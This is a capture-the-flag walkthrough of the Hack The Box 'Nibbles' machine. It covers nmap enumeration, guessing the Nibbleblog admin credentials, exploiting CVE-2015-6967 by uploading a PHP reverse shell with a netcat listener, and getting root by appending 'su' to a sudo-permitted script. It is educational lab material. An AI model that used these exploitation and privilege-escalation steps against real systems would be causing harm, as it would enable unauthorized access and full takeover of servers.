Hack The Box – Nibbles

Enumeraction

As always, we start with an nmap against the machine’s IP.

[email protected]:~|⇒  nmap -sC -sV 10.10.10.75
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 19:04 BST
Nmap scan report for 10.10.10.75
Host is up (0.067s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.29 seconds

As you can see there’s an SSH service and Web service running. Head over to the web service wih your browser and you’ll see a ‘hello world’ page.

Inspect the page and theres an HTML comment that mentions ‘/nibbleblog/’, so navigate to that URL; http://10.10.10.75/nibbleblog/

Nibble Blog is a simple blogging web application. Searching for vulnerabilities online, you should come across CVE-2015-6967, but we need a login to be able to perform the exploit. A little more searching and you can easily find the default login page for this app; http://10.10.10.75/nibbleblog/admin.php

Getting the credentials is very easy and just requires a little bit of guess work.
What’s the default admin username for most applications? admin.
What word is used a lot on this machine? nibbles.
Chuck those credentials in to the admin page and you should be logged in to the dashboard.

Nibble Blog Exploit

Details of the exploit can be found on Curesec Research Team’s website. What it does is basically take anything you upload using the My Image plugin and saves it as image.php meaning it’s available for execution from within the browser.

To leverage this exploit, we’ll use pentestmonkey’s PHP Reverse Shell script to get a reverse shell.

Start up netcat with your chosen port to listen on e.g. nc -lvnp 4447.
Change the IP and Port in the PHP script to match your IP address and the port you’re listening on with Netcat. Save, then navigate to the My Image plugin in the Nibble Blog dashboard and upload. Ignore the errors.

Now to hit the content that’s just been uploading requires a little digging in to the Nibble Blog code, or you could look athe Curesec Research Team’s code snippet to see what’s going on. Basically each plugin appears to get it’s own ‘space’ to store files. This plugin uses that space and saves the file as . which is image.php. The plugin file storage directory is /content/private/plugins/my_image/. Add the 2 together and you should hit a page which seems to take forever to load, however check on your netcat and you should see you now have reverse shell! Check the user’s home directory for the first flag, user.txt.

PrivEsc

First we’ll run sudo -l to see what access to sudo the current user has.

$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

We can see that the user is able to run /home/nibbler/personal/stuff/monitor.sh as root without a password. So let’s head over there and investigate.

$ cd /home/nibbler
$ ls
personal.zip
user.txt

No personal directory, but there’s a zip. Extract the zip and you’ll see that it extract the directories and file that we’re looking for. Execellent.

$ unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh  
$ ls
personal
personal.zip
user.txt
$ cd personal/stuff

Since we’re able to run this shell script as root, let’s inject a simple su command, which will switch us to the root user. Use chmod to set the file as executable and then run it.

Note: >> appends to a file, where’s > replaces the contents of a file.

$ echo "su" >> monitor.sh
$ chmod +x monitor.sh
$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
ls
monitor.sh
whoami
root

BOOM! We’re now root. Head to the root directory to collect your prize.